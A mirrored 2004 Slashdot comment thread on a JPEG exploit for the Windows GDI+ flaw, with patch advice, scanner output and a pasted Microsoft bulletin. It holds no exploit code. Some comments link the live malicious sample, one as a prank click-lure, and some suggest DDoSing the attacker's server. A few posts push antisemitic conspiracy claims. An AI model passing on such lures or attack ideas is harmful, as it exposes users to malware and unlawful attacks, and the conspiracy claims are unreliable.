Slashdot Mirror
First JPEG Virus Posted To Usenet
Shawn writes "This could possibly be the worst viruses yet! Earlier this month Microsoft announced a problem in their GDI driver that processes the way JPEG images are displayed. Someone has finally posted an exploit to Usenet. Easynews, a premium Usenet provider, found the virus Sunday afternoon. Up-to-date information about how we found it and what it does is located at www.easynews.com/virus.txt. When this picture is viewed it installs remote management software (winvnc and radmin) and will connect to irc."
I want to see what GraphicConverter does with this.
One more reason not to look at that goatse picture!
Usenet posts JPEG viruses to you!
Congrats, microsoft, for making just about every filetype unsafe.
The worst part is that you don't even need to be using IE. Hopefully mozilla decodes the jpgs itself before rendering them on windows.
autopr0n is like, down and stuff.
Hopefully not too many people get hit by this...
Meanwhile, I'm just happy I don't run windows at home!!
This exploit could also be used by inserting the code into certain applications that render JPEG images while running. Also, email worms that have JPEG images attached with the code could cause mass havoc. Glad im on OSX!
gShares.net
-------
artlu.net
Here we go again... Hold on... woooooowww. :)
I hope I'm safe enough by not using many Microsoft apps, but I'm not sure about that. Sucks.
It's better to vote for what you want and not get it than to vote for what you don't want and get it.
- E. Debs
Update your systems now! The patch has been out for several weeks. I have already applied it to my corporation via SUS (which is free) and am rolling out the office patch now, as well. There is no reason other than laziness or sysadmin ignorance for this to be another massive virus attack.
This sort of thing ushers in a new era of exploitation in which the warnings of security professionals in the past have been proven dreadfully wrong. Only the bearded terminal hackers are invulnerable to this one, typing away at their command lines being all, "What JPGS?". No longer can we simply give advice on security based on our assumptions as to what is possible and what is not. We must pay the piper and actually consider attack vectors that have formerly not been feasible.
I wish Snort had intrusion prevention capability. = wink wink=
Does this affect Firefox?
It was only a matter of time. Now we wait for a dozen variants to pop up.
"This could possibly be the worst viruses yet!"
Hm...maybe when he started typing there was only one and it spread during the sentence?
GOD SAVE THE PR0N :)
I guess those nude pictures of Anna Kournikova could indeed be a virus.
Virus writers should be dragged out in the street and... well, whatever.
The only reason we need security for this crap is because the viruses exist. Which means that we only have security when the need arises. If the vulnerability exists but is never exploited, it tends to sit open and unpatched. As soon as this pops up, we see vendors frantically patching systems.
I usually call it like I see it - which means defending the bad guys when they deserve it. But in this case, there's no doubt that open source has major advantages. The vulnerability has been identified, people are complaining that it's not being fixed... I bet it takes a virus to get MS (and others) moving to fix it.
What browsers are protected from the jpeg virus? I remember IE and some earlier versions of Mozilla being said to be vulnerable to this. This could be my incentive to upgrade Firedragon, or whatever they call it these days.
We all live in a #FFFF00 submarine...
If you aren't running as an administrator, which you shouldn't be, it can't install itself. It's the same as Linux or any other OS with a basic user system.
Interested in open source engine management for your Subaru?
clamscan possibleVirus.jpg
possibleVirus.jpg: Exploit.JPEG.Comment FOUND
----------- SCAN SUMMARY -----------
Known viruses: 24607
Scanned directories: 0
Scanned files: 1
Infected files: 1
Data scanned: 0.00 MB
I/O buffer size: 131072 bytes
Time: 0.501 sec (0 m 0 s)
also updated nav corp 8 with latest defs (9/27/04) and it found it. AVG free edition doesnt as of yet.
Lawyers, MBA's, RIAA? A jedi fears not these things!
your neighbors open accesspoint, a copy of Airpwn and a suitably infected jpeg. Sounds like a pretty nasty situation in the making to me.
www.linux-skunkworks.com
No Screenshots, please!
Tell the truth and you won't have so much to remember.
No, just a backdoor.
Ok, no offense, but beanie-babies and erotica? There are some newsgroups that just shouldn't exist.
These could be the worst grammar too!!!
If you read through the actual posting, it is apparent that this while may be the first GDI/JPEG-based worm, but it is certainly not going to be the worst. First of all, unless I missed it- this code does not even self-replicate (i.e.- it doesnt mail itself to others, or post itself to usenet, or otherwise exploit vulnerable systems) I would expect to see some script kiddies combine this proof of concept trojan with some social engineering type email worms, and then t**THAT** will be a nasty worm.
yes, if you haven't updated to the latest version.
See this Slashdot thread.
- Leo
You don't use science to show that you're right, you use science to become right.
put the image on doubleclick.net
Real Player and that piece of crap spyware that Dell calls a media player just blithely tried to open the file without performing any integrity checks whatsoever, and damn near crashed the system.
I bet this sort of thing is a helluva lot more endemic than people realize.
If you are using Windoze, run ZoneAlarm from ;^)
ZoneLabs. Every program that tries to access
the internet in any way has to pass through
this program and be okayed by you! Just click
DENY and REMEMBER THIS SETTING. The software
will still be installed but it can't get back
to the LOSER who released it!
apparently, the text indicates, that's the only source for the installed files.
if say, 500 of us were to log into that and stay connected, would we stop the virus? would there be any risk to ourselves? (giving your IP away for a start).
This is my Sig, this is my Gun. One is for Slashdot and one is for Fun.
Our university campus has a huge problem with viruses and this is another exciting addition to our collection. I'm sure I'll start seeing on plenty of guy's asking for help getting this removed, after finding out pornstars aren't virus free after all.
Thankfully, though, this shouldn't cause as much trouble as our current crop of worms. I'm shocked at how dumb our users are, as a whole. We're still having people infected with blaster, over a year after Microsoft patched that vulnerability! Sasser is absolutely rampant. The school even purchased a blanket liscence of Norton, but I would bet less than half of the students have installed it. We have a T3 line providing our outside connection, and it's currently averaging about 7 Mbps combined up/down, because the internal network, which is mostly linked from buidling to building by gigabit fiber, is saturated by virus crap. Although this virus may have a really effective way of spreading, it scares me very little.
Now i can go exploiting people! Thx for the virus easynews! http://easynews.com/virus/virus-jpeg.zip
There's no Freedom like UFP-dom
Come on... admit it you've all been dying for this slashdot posting. You didn't think all this hype about the microsoft GDI thing wasn't going to pay off? Well there you go.... feast on microsofts pain....
Anyone know if this exploit can be done when the user is using a Windows Limited account?
I don't see any indication that it's a virus at all. Just that the jpeg installs remote admin tools, connects to IRC and other typical things.
How does it propagate?
FYI, here's the fix from M$ for this exploit: Security Bulletin
It is very hard to get in right now. I've set FlashFXP to retry 1,000 times every 15 seconds. We'll see how that goes.
The more of us that keep this connection tied up doing innocent things for the next 48 hours, the better.
There really needs to be a distributed DDOS for spammer sites, virus sites, etc. Use The Force for good, I say.
Lose Weight and Feel Great with Isagenix
Can somebody explain how this affects me? How can a picture be a virus? It's looks like Notepad opening readme.txt and formatting your hard drive. And what viewers and browsers can do it? If I save it an doubleclick from the desktop explorer? Is it a picture or a viewer problem? If I use an old version of a broswer or 95 OS will it still create problems? If I use a firewall like ZA will that stop it? Anytime I see these virus problems I never know. Of course whenever I do check my comp for problems with both an AV and spyware blocker it finds nothing. Of course I don't download willy-nilly.
Why don't you guys have friends or journals?
Why can't it just nuke the hard drive like the old virii did? Teach people a little about access levels and system patching.
[Since it seems to me it might be good for us all to collect as much information as possible in this thread ...]
PS: just for the hell of it, on a box that's not using one of the allegedly vulnerable versions of Windows or IE (it's NTWS SP6a, IE5.5), I tried to open the Easynews sample image using Irfanview V3.80, which displayed the error message :
I suppose I'd better run a full scan of my peecee anyway now ... sigh ... I wonder which JPEG library Irfanview uses ...
Although the SANS website says their scanner is written for Win2K+, it seems to run on NT (although the output format is a bit screwy), and it reckoned there is one vulnerable DLL, at
Dunno where that came from, but it describes itself as "Microsoft Vector Graphics Rendering(VML)", and - fascinatingly - the copyright says "Unpublished work. Copyright© Microsoft Corporation 1983-1999. All rights reserved."If you don't pray in my school, I won't think in your church.
Not in these parts...
Why doesn't slashdot allow you to post images! :)
Does this mean all those lonely college bachelors have to stop downloading porn until MS patches the hole?
Wasn't iLoveYou the worst virus ever? Or Stages? Or Melissa? Or Nimda? Or the "Good Times" virus? This one will fall into obscurity, too.
Use Evolution instead of Outlook? Bewa
Strange. Our clients, suppliers, and CEO and haven't noticed any of the above effects on our $10 million turnover.
Nice try.
I remember a web page once that had HTML that was known to crash certain versions of Internet Explorer. Some kind of buffer overflow diddling via HTML couldn't be that far off. Declarative protocols can clearly be full of holes also, not just executable content.
Table-ized A.I.
Just out of curiosity, does anyone know if x86 no-execute protection(the NX bit, aka the XD bit, aka Data Execution Protection) prevents against this? With the release of SP2 and DEP support, it would seem that this would be a good test to see if DEP is all its cracked up to be.
What, now you can't even WATCH sex without protection?
In my day, an article like this would have been a downright joke. Seriously, this is such a milestone that I'm filing the article in my permanent news archives.
In retrospect I don't know why we thought such a thing was impossible for so long? After all, buffer overflows or other coding problems can result in malicious code executing. I guess what we didn't expect "back then" was that computers primarily engaged in networking activities would be running vital parsers - HTML, ActiveX, images etc - within the operating system itself, with administrator level privileges.
Wouldn't it make sense to limit the scope of any kind of modular parser/crypto using privilege isolation, so that even if malicious code starts running it is utterly incapable of affecting anything else?
i.e. shouldn't all such modules - crypto, image, parser run within some kind of privilege jails and communicate with the involved application using something like a socket? Hell, couldn't Windows do just that and wrap it up so API users don't notice? What am I missing here? I'm not picking on Windows here, same thing could be done on *NIX.
I just ran the updates on an XP machine. It claimed that there was vulnerable GDI code on the machine and I should go to the office update page. Guess what: the office update page said there were no updates. So, apparanetly the system is vulnerable, but there is no way to fix it. Wonderful!
The real "Libtards" are the Libertarians!
. . . of kiddy porn. The pervs grab the jpeg, load it, and it quietly calls home to the FBI, where a dot matrix printer prints out another warrant for a judge's signature . . .
One CPU cycle wasted on digital restrictions management is ONE TOO MANY.
I sure hope Netfirms have good logs, and that the bastards who did it were stupid enough to set the account up directly from their own machines rather than via a compromised intermediary.
If there's no name yet, how about the Medusa virus?
So what happens when someone hacks the ad server that cnn or google uses, and puts this jpeg up?
Millions of instant zombies.
Thats f*cking scarry....
TechNet Home Security Microsoft Security Bulletin MS04-028 Buffer Overrun in JPEG Processing (GDI+) Could Allow Code Execution (833987) Issued: September 14, 2004 Updated: September 21, 2004 Version: 1.2 Summary Who should read this document: Customers who use any of the affected operating systems, affected software programs, or affected components. Impact of Vulnerability: Remote Code Execution Maximum Severity Rating: Critical Recommendation: Customers should apply the update immediately. Security Update Replacement: None Caveats: If you have installed any of the affected programs or affected components listed in this bulletin, you should install the required security update for each of the affected programs or affected components. This may require the installation of multiple security updates. See the FAQ section of this bulletin for more information. Tested Software and Security Update Download Locations:
Affected Software:
Microsoft Windows XP and Microsoft Windows XP Service Pack 1 - Download the update (KB833987) Microsoft Windows XP 64-Bit Edition Service Pack 1 - Download the update (KB833987) Microsoft Windows XP 64-Bit Edition Version 2003 - Download the update (KB833987) Microsoft Windows Server(TM) 2003 - Download the update (KB833987) Microsoft Windows Server 2003 64-Bit Edition - Download the update (KB833987) Microsoft Office XP Service Pack 3 - Download the update (KB832332) Microsoft Office XP Service Pack 2 - Download the administrative update (KB832332) Microsoft Office XP Software: Outlook® 2002 Word 2002 Excel 2002 PowerPoint® 2002 FrontPage® 2002 Publisher 2002 Access 2002 Microsoft Office 2003 Software: Outlook® 2003 Word 2003 Excel 2003 PowerPoint® 2003 FrontPage® 2003 Publisher 2003 Access 2003 InfoPath(TM) 2003 OneNote(TM) 2003 Microsoft Project 2002 (all versions) and Microsoft Project 2002 Service Pack 1 (all versions) - Download the update (KB831931) Microsoft Project 2003 (all versions) - Download the update (KB838344) Microsoft Visio 2002 Service Pack 1 (all versions) and Microsoft Visio 2002 Service Pack 2 (all versions) - Download the update (KB831932) Microsoft Visio 2003 (all versions) - Download the update (KB838345) Microsoft Visual Studio .NET 2002 - Download the update (KB830348)
Microsoft Visual Studio .NET 2002 Software:
Visual Basic .NET Standard 2002
Visual C# .NET Standard 2002
Visual C++ .NET Standard 2002
Microsoft Visual Studio .NET 2003 - Download the update (KB830348)
Microsoft Visual Studio .NET 2003 Software:
Visual Basic .NET Standard 2003
Visual C# .NET Standard 2003
Visual C++ .NET Standard 2003
Visual J# .NET Standard 2003
The Microsoft .NET Framework version 1.0 SDK Service Pack 2 - Download the update (KB867461)
Microsoft Picture It!® 2002 (all versions) - Download the update
Microsoft Greetings 2002 - Download the update
Microsoft Picture It! version 7.0 (all versions) - Download the update
Microsoft Digital Image Pro version 7.0 - Download the update
Microsoft Picture It! version 9 (all versions, including Picture It! Library) - Download the update
Microsoft Digital Image Pro version 9 - Download the update
Microsoft Digital Image Suite version 9 - Download the update
Microsoft Producer for Microsoft Office PowerPoint (all versions)
Microsoft Platform SDK Redistributable: GDI+ - Download the update
Office Users Note Office XP Service Pack 2 and Office XP Service Pack 3 are both vulnerable to this issue. However the security update for Office XP Service Pack 2 is only provided as part of the Office XP administrative security update. For more information, see the Security Update Information section. Office
Furthermore, you would not need a firewall if you were not running services that bound to things other than localhost. Since Windows firewall (prior to SP2, not sure whether SP2 has this functionality) doesn't let you pick who gets through to your ports, users should have the choice to shut down all ports exposed to the net. Keeping ports open and firewalled to everybody seems stupidly inefficient.
It was Bug Month, not security, though that's related. It was in 2002. The shortest month, February.
... "It's time to get the garage cleaned out."
"We are not coding new code as of today for the next month," Richard Purcell, director of the Microsoft's corporate computing office
Which I thought was straight PR, and if there were any acutal deferrals of project waypoints, this time would be spent dealing with personal inbox overloads.
But I did get contacted by a Microsoft engineer during that time, re a software failure I'd detailed online. {Nothing's been fixed, mind you.}
"Quality freefall"? Not really. They've always produced third tier code. This is normal. The only difference right now is they're feeling more heat about it because programs can do more, and they've got competition they can't kill in Open Source. The profitability of their poor quality of approach is falling against these two rising variable. Quality itself has been steady state.
because i see a vulnerability in it..
... someone defaces a popular website with such an image. Imagine if someone replaced the main image on the worlds most popular search engine!
Or if someone posts such an image to an automatic image rating site (are they still popular? does hotornot still exist?)
Heard way too many horror stories about SP3 and decided not to take the chance (since SP2 killed my system and required a complete reinstall). Are there any standalone patches for SP2 available?
If the g'vt kept the data on you that google does you'd better believe you'd be calling it "doing evil"
Does anyone remember those ANSI bombs of old? I remember BBS's had all sorts of elaborate protections against them, zipfile comments etc.
members are seeing something, your seeing an ad
This looks like it could be the worst Window virus to date. What is the easiest way block this specific code from getting through a Linux NAT/firewall?
- how can I drop any packet containing a particular sequence of bytes?
- better: how would one do it at the TCP level so you catch it even if it spans more than one packet?
I was talking with a friend on MSN... coincidentally after reading on this for about 2 hours. The first thing she said i was very suspicious: C3ly$c3 says: you there? ...http://www.xf2s.com/msn/wode.jpg.
err a jpeg surrounded by a bunch of other characters ... sounds suspicious
I dont know if this is actually the virus.... im on my laptop right now which runs windows (unpatched of course)
If it can install a service, it can disable or punch a hole into any fireweall running on the client. A client firewall, IMO, is worse than nothing in that it provides a false feeling of invulnerability.
One CPU cycle wasted on digital restrictions management is ONE TOO MANY.
I don't know about AIM, but MSN reencodes all images to PNG. I don't think there's going to be much risk from that.
-ReK
md5sum -c reality.md5
reality: FAILED
md5sum: WARNING: 1 of 1 computed checksum did NOT match
You'd be breaking several laws in the process. So I wouldn't suggest it ;)
http://www.archive.org/details/ThePowerOfNightmares
That'll fix it...
Oh well, what the hell...
I played with the sample code to crash a machine last Friday. That code produced a 2K JPEG. (Likely it was smaller but I'll bet 2K is the block size on my 80 GB hard drive. File is at work so I can't check it now.)
7K sounds very reasonable if all it has to do is download the real executables.
Technically, this is a Trojan Horse, not a virus.
the irc channel has been slashdotted... thats new
Sorry to be nitpicky here, but this is a trojan horse, not a virus. A virus propagates through replication.
LS
There is a fine line between being a cultivated citizen and being someone else's crop. - A. J. Patrick Liszkie
That /.ers can reference generic sounding apps like GraphicConverter and Preview without mention of the operating system?
Apple really has come a long way around here, eh?
It's all pretty simple there. To install something you have to put in the admin password. Unix made easy.
The way Apple does it (by app) is FAR more intelligent than having to make a user an admin or log out of the system entirely to log in as an admin.
I have a few applications here at the school that demand admin privs. I've all but given up trying to restrict them. But as anyone who has seen the proliferation of unwanted toolbars can attest - the cost is high.
"...Well, there's egg and bacon; egg sausage and bacon; egg and spam; egg bacon and spam; egg bacon sausage and spam..."
Interesting that this virus, which has been in the wings and known of by select groups for years now, should at this time be given lots of promotion, (a few virus releases and big, loud press attention like a freekin' summer movie advertising run), right when the most important US election in the history of mankind is gearing up.
Having people scared out of the public places so that they can't discuss the events which are about to unfold. . ?
And some dorks still laugh at me and say I'm a paranoid conspiracy nut.
--Goodness! Well, if conspiracies don't exist, why are there laws like, 'Conspiracy to commit _____' on the books? And who but the lying psychos in government are better suited to pulling such stunts? Only a nut would actually lower his/her guard over the next couple of months!
Count on this: If any 'terrorism' happens in the next 5 weeks, you can be sure it will have been be aided and abetted by the US and/or Israeli secret services.
Not that you'll be able to talk about it on-line, what with all the scary viruses and all!
Buckle up, kids. This stretch of road is about to get bumpy.
-FL
It will trojan zillions of systems, leaving them open for all sorts of havoc.
Right before the US presidential election, a time where terrorists worldwide are feverishingly searching for a huge american backdoor. Expect DDOS against the most "important" croporate servers.
All this thanks to programmers fuckingly stupid enough to use a low-enough level language that is rife with buffer overflows and to their managers for allowing them to turn-out such sloppy products.
Hopefully this will be the straw that breaks the camel's back, and will cause massive interrogation of the "wisdom" of using Microsoft products and raise the awareness about alternatives.
Does running the apps in a non-admin account solve this problem? Only admins can install new services, right?
....it's a posting to an adult newsgroup, the kind that renders little thumbnails of nasty, farm animal love and other things that must not be mentioned here.
it has no other way of spreading. you have to be either moronically inquisitive or a seriously wacked pervert to get infected with this "virus," b/c you'd have to either click on a link taking you there (and "she-males-love-it-up-the-@$$" from alt.binaries.multimedia.erotica.transsexuals" is not a best-seller) or you must be a total sicko.
...because you never know who you're dealing with.
Bleeping Computer has a tutorial on how to use GDI Scan, offered by ISC, to find apps with the vulnerable gdiplus.dll. The tutorial can be found here:
GDI Scan Tutorial and how to fix the GDI+ JPEG Vulnerability
Either update those apps so they dont have the problem anymore, or do not use the app.
I saw a weak outgoing attempt to 209.171.43.27, but nothing came back :-(
Better role the ol' VMware snapshot back just in case.
im on my laptop right now which runs windows (unpatched of course) Of course? Uh, why?
...at isc.sans.org (internet storm center). Do
not use the one from microsoft. It *sucks*.
Watch dshield (like a hawk). Read www.cert.org.
read "comp.risks" (usenet).
and still lose too much time..
We didn't have Clippy the paperclip in 1994...those were dark times indeed. Praise be to Microsoft, for delivering anthropomorphized office supplies unto the wretched masses!
If your behind any kind of firewall, and I know I'm saying *if*, then remote admin wont do you much good for remote connections unless you've got port 4899 open. If they are using a different port mapping in the registry file the it will conflict if you have another service running on that 'standard' port. Seem's pretty bad to install an app like remote admin for that purpose.
Why do overlook and oversee mean opposite things?
For a Windows server to run it on. Plus more for additional client access licenses. Which is fine if you've already spent that money.
For the rest of us, grab WindowsUpdate Cache. Runs on Squid, the world's most popular proxy server.
hrm being a developer who has used gdi+ before, it is not only for viewing jpegs. It does have a jpeg/gif etc viewing component to it. So just because an application uses gdiplus does not make it vulnerable. Picture viewers that depend on gdiplus (probably the built in one in winxp, word and other viewers that rely on gdiplus for jpeg viewing are vulnerable)
I'm also curious to know if this virus works on winxp sp2. Wasn't all the fuss about sp2 the NX flag to prevent executions in case of buffer overflows?
Or does this virus only target the unclean?
did you forget to take your meds?
The MSN server surely has enough bandwidth
for spamming service.
or do you make the upgrade keep your settings, and keep the plugin format backwards compatible?
i hate pansy republicans
Google surely has the largest kiddie porn
collection on the planet. Note the thumbnail
images returned by the image search.
The workaround is to not use any programs which require graphics. Please switch to using the command prompt for all applications until a patch has been made. Edlin is the recommended editor for security minded users. Now Microsoft just needs to post documentation on how to edit microsoft word format docs via binary editing in edlin and we'll be back to normal!
MSN reencodes all images to PNG
That brings to mind the question of if the reader on the server is using a standard library that might have buffer exploits, so that you could alter the server to start feeding out PNG's with viruses (assuming a similar attack could be found in the PNG reader in windows, not sure if that's true or not).
"There is more worth loving than we have strength to love." - Brian Jay Stanley
Apparently some anti-virus programs catch it, but we all know that not everyone running a windows system keeps up to date spam filters. And *many* of the email programs for windows will render images, even in a preview pane. This is a huge, huge problem.
I'm sure that *this* time, MS's major customers will demand improvements! ...in other news, Moller will finally get his SkyCar to market, cold fusion will be proven true, and all the PHB's in the world will be canned and replaced by people with a clue.
-jcr
The only title of honor that a tyrant can grant is "Enemy of the State."
From www.ijg.org. This library is very popular.
And if yes, are all application linking this library subject to the vulnerability?
If yes this will be a lot of work to update all applications.
In cyberspace nobody knows you're a cat!
It's up to the educated people to inform them then, or make the system safer. I've built several varieties of linux desktops, and for the mostpart the users have no idea what "root" is... as in the apps that need root access (Synaptic, apt scripts, etc) are run via sudo and everything else runs in the user level.
...that's a virus!
gone are my days of safe pr0n browsing....
unfortunately it's not quite that simple **points up**
If I recall there was an image handling vulnerability in Thunderbird 0.7.3. When that came to light I updated to 0.8. Unfortunately, 0.8 ships with a bug which means that in many cases, a basic POP3 email account can't be validated properly.
So... the current release of one of the flagship Free software projects doesn't work, but you can fix it by downgrading to an older version with a major vulnerability. Excellent!
I submitted a story on this problem to Slashdot but hey, who wants to discuss problems with Free stuff when there's always another cheap crack to make about Microsoft, eh?
they've added some value: wrote a script to pick up the first publically available exploit by mining their massive usenet feed. it's fair enough they should get some publicity of the "gee, these guys are switched on, they really know their usenet" type. props to them.
I went to a conference recently where Microsoft was explaining how to get games to behave under windows - for example don't write your save files to c:\program files and don't mess around with HKEY_LOCAL_MACHINE at runtime. There were less than ten people there, most of whom were speakers. And so I notice most games (and many other packages) require to be run with admin privileges. They still think they are writing DOS games, except with a snazzy graphics library.
I'm just wondering how long it will take the spyware/adware people to exploit this like with one of their annoying banners. Also I expect this could also be done by the spam gangs to create more new zombies for spamming.
Anyone knows exact date of release.?
Someone has finally posted an exploit to Usenet.
Let me guess: the subject was "Good Times"?
sudo ergo sum
The GDI Scan tool from ISC reveals that after all of the latest patches for Windows and Office, I am still left with vunerable .dll files within office.
.dll dated May 2004.
x s.dlll ll ln dows.GdiPlus_65 95b64144ccf1df_1.0.0.0_x-ww_8d353f13\GdiPlus.dll
Version: 5.1.3097.0 -- Possibly vulnerable (Windows Side-By-Side DLL)P lus_65 95b64144ccf1df_1.0.10.0_x-ww_712befd8\GdiPlus.dll P lus_65 95b64144ccf1df_1.0.2600.1360_x-ww_24a2ed47\GdiPlus .dll
Further... the version of the GDI redistributable on the MSDN site still includes a vunerable version of the GDI
On this fully patched Windows XP system GDI Scan reveals the following information:
Scanning Drive C:...
C:\Program Files\Common Files\Microsoft Shared\Office10\MSO.DLL
Version: 10.0.3501.0 -- Possibly vulnerable (Under OfficeXP only)
C:\Program Files\Common Files\Microsoft Shared\OFFICE11\MSO.DLL
Version: 11.0.6360.0
C:\Program Files\Common Files\Microsoft Shared\VGX\vgx.dll
Version: 6.0.2800.1106 -- Possibly vulnerable (Win2K SP2 and SP3 w/IE6 SP1 only)
C:\Program Files\Microsoft Office\OFFICE11\GDIPLUS.DLL
Version: 6.0.3264.0
C:\Program Files\Microsoft Works\GDIPLUS.DLL
Version: 5.1.3102.1360
C:\WINDOWS\$NtUninstallKB833998$\s
Version: 5.1.2600.1106 -- Possibly vulnerable (Backup for uninstall purposes)
C:\WINDOWS\$NtUninstallKB839645$\sxs.d
Version: 5.1.2600.1336 -- Possibly vulnerable (Backup for uninstall purposes)
C:\WINDOWS\system32\dllcache\sxs.dll
Version: 5.1.2600.1515
C:\WINDOWS\system32\dllcache\vgx.d
Version: 6.0.2800.1106 -- Possibly vulnerable (Win2K SP2 and SP3 w/IE6 SP1 only)
C:\WINDOWS\system32\sxs.dll
Version: 5.1.2600.1515
C:\WINDOWS\WinSxS\x86_Microsoft.Wi
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Gdi
Version: 5.1.3101.0 -- Possibly vulnerable (Windows Side-By-Side DLL)
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Gdi
Version: 5.1.3102.1360
Scan Complete.
What you can do now to limit the spread:
* Update all of your virus checkers and make sure that they are fully active (auto, not just on-demand).
* Disable images in your email applications, just use text only.
* Switch your primary browser to Firefox or another browser whose latest version is immune from this specific attack. If you have to still use IE, then do so only for sites you truly trust.
Just click on this link:
;-)
http://www.easynews.com/virus.jpg
[Please type your sig here.]
Mosaic always had the option to not display images. All graphical web browsers have this option.
What's the world coming to when a man can't even trust his primary source of illegally and anonymously redistributed leeched fetish porn?
These people make me sick.
Does this mean that lynx is still vulnerable?
You are standing in an open server west of a blue house, with a boarded front door. There is an Exchange mailbox here.
* Eye of Gnome seemed to work okay, but I got all sorts of weird redraw problems when I tried to resize the window.
* Gimp (2.1) says the JPEG is unsupported and couldn't be imported by the filter, then segfaults.
* Konqueror seems to work okay, but just shows a tall black rectangle, and its spinner is still chugging away, as if it's still busy loading something.
* Firefox 0.9.3 has no troubles at all; it just shows a nice white rectangle on a white background
These programs are not vulnerable to the the exploit in the same way that Windows machines are vulnerable. In fact, the issues you saw appear to be in no way related to the intended result of the virus. GIMP's segfault seems to be the most serious of these, and it is still a minor problem. I believe all of your results can be achieved by opening a mangled/corrupted
Nutshell: One cannot conclude that graphics-related processes/apps on Linux machines are vulnerable to this virus.
PS Conclusions posited based on "unprofessional research and wild conjectures" are likely to cause much more harm than good. Is this really necessary? (not a flame - just an observation)
I want to drag this out as long as possible. Bring me my protractor.
Folks, can we please not post a direct link without the disclaimer? It seems to me to be a bit beyond rude.
For the record, here's the disclaimer (which I find silly, but that's not the point, I didn't decide to take on the exposure of hosting this thing for the researchers who will need access):
I don't know much of Linux internals, but I don't think it is obvious that it is vulnerable just because programs can get confused by unexpected data.
and be done with the problem once and forever?
;)
No, seriously
Or at least create one that warns victims about the hole..
Well actually it might be good too, this will probably further hasten the fall of IE and windows.
Be quick.
Sample squid code:
Or, more reasonable:
and stick 209.171.43.27 into that file (and all following IPs that will use that code).
Then use ClamAV to scan your squid-cache the next couple of days and remove infected files.
And I've already seen the first ones bumping into my virus scanners (which luckily have a patch for these malformed jpgs)...
Just don't allow Windows boxes on the network. Problem solved....
Think Deeply.
Ive taken this as a good opportunity to mail all my contacts who I know still use IE at the instance of corporate IT departments, asking them to suggest to their departments the immediate ability to install an alternative such as Firefox. Im sure many others here do something similar, but for any one who has not its situations like this which unfortunately can help us to promote a safer alternative browsing platform for all of us.
"Count on this: If any 'terrorism' happens in the next 5 weeks, you can be sure it will have been be aided and abetted by the US and/or Israeli secret services."
uhm, WHAT?!?!?
i agree with parent, GP is a paranoid conspiracy anti semitic nut.
When I was at college, all of the computers ran nt 3.51. So It was a common occurnace to enter acomputer lab and see 1/4 of the computers sitting at the blue screen of death. There was a dramatic increase in quality when they upgraded all of the existing machines to NT4. Blue screens were very rare. Then again they waited for service pack 4 before upgradding, so I'm sure the previous versions were not as solid.
Well.. maybe. Or Maybe not. But Definitely not sort of.
This could possibly be the worst viruses yet!
Even MS Word's grammar feature would have caught this one...
There's been some discussion of the problems facing "fleet operators" due to this bug. It seems that various product teams have spewed so many private versions of the .DLLs all over users' systems that the people who maintain the security-patch list in XML just gave up. SMS won't detect the need for the patch, and neither will MBSA, I'm told. Whether SUS (standalone, not the Feature Pack for SMS) will is not yet clear.
Well, that's just dandy. I've got 200 machines that need patching and no centralized tools, maybe. Oh, joy.
Now I'm wondering how I'll ever trust those tools again.
> I want to see what GraphicConverter does with this.
I'm not cruising the alt.binaries.erotica.* groups for the p0rn, I'm doing field research on this new trojan.Some mornings it's hardly worth chewing through the restraints to get out of bed.
... does this qualify as sabotage of Usenet by Micro$oft?
Since the .net framework is listed as vulnerable and RSS readers typically use it, will they need
patching?
The developers have set up Doom3 and the The Sims 2 to run as "root" (Windows) for a very good reason, and it's not because of programming incompetence. The reason they have done this is because both games are considered "adult" and not to be played by kids. This is why you need admin priveledges, it's an attempt to "password protect" those games that are adult in nature. ICQ has explicitly stated, as a matter of fact, that this is why you need admin priveldges to run it.
"Implications", not "implementations". I noticed just after I hit Submit. Sorry; I just got up.
Worst. Post. Ever.
Is some freshman psychology major going to format their drive, back up all their files, and install Linux? No. Are they going to be able to use Linux? Doubtful. Is linux going to detect their generic sound cards and network adapters? Yeah, right. Are you going to have chaos and pissed off students? Yes. Are you going be the one to tell them they can't use their brand new Dell without totally fucking re-doing all of the software or are you going to tell them it's worthless and to go spend $1000 on a new Mac?
You are seriously fucking stupid. Start living in the real world.
Linux isn't vulnerable to this particular image. In this case it only affects Microsoft's software.
-1 FUD slinging
Transparently proxy web access. Log access to the norton AV update site, just a timestamp and an IP. Then you have a log of IP addresses and whether they have Norton installed, and the last time they updated.
If they don't update every two weeks, then trigger the transparent proxy so that any access to anything other than the Norton update page and the local page for downloading NAV displays a static page that says "Your access is blocked until you update your AV software." Give them a download link to grab their copy from.
It seems to me that you have a perfectly legitimate right to restrict access to a commons only to people who have taken steps to not be a threat to others in that area. You can require people to get immunized before going on a trip where they'll be in close contact with other people, so it seems you can require people to immunize their computers before you let them use YOUR equipment to put them in close proximity to other people's equipment.
How long will it be before a bunch of students sue a university to recoup cleanup costs because the university did not exercise due diligence in maintaining a clean network, when doing so is clearly technically feasible.
I don't want to make you feel stupid, but the argument you present here is a actually a common misconception; I believed it once as well until I began to examine the puzzle more closely.
Try thinking of it this way. .
Your trying to discredit the idea of, "The Conspiracy," through ridicule (re, "CUCKOO, CUCKOO"), is in fact part of the very same 'Conspiracy'. --But you didn't take orders, nor did you receive an envelope from a shadowy figure. Still, this doesn't alter the fact that you are a part of a large group of people engendering a certain belief system, and that you are affecting how the world filters and perceives data and events. --If you get enough people doing as you do, repeating, "He's Crazy" often enough, then the perception is created of a sort of 'moral majority' at work. And people can be counted on in most cases to react in a few very specific ways;
-People, on a gut level, will Fear the ideas being ridiculed and want to look away or in fact join in the chorus of disagreement so as to be part of the 'popular' crowd and thus avoid being ostracized themselves. This social programming is typically installed during childhood on school yards, and it is one of the most powerful methods to control population behavior in use today.
That is, ridiculing and heaping social abuse upon a subject with enough strength will cause the rest of the world to look the other way. Almost every time. Amazing! And yet, where is the 'Vast Conspiracy?' to make this happen?
Oh, it's there. It's just far more effective than most people give it credit, and far more invisible. The interesting fact is that when it is in full effect, conspirators do not NEED to keep secrets because the population is actively, deliberately looking the other way.
That's why the points you raise about the impossibility of thousands of people keeping a secret, (while true!), is not an issue.
And let's look at an example of a recent 'conspiracy' which was caught, which has massive implications, and which everybody ignored, choosing instead to believe in the installed falsehood. .
--This recent story about Canwest Global [www.cbc.ca], which owns much of the news pie in Canada is an excellent example of a small number of people influencing millions in regard to the activities of Zionist Israel.
There are those two charged words; ask yourself. . . Are you reacting at this moment rationally or emotionally?
-FL
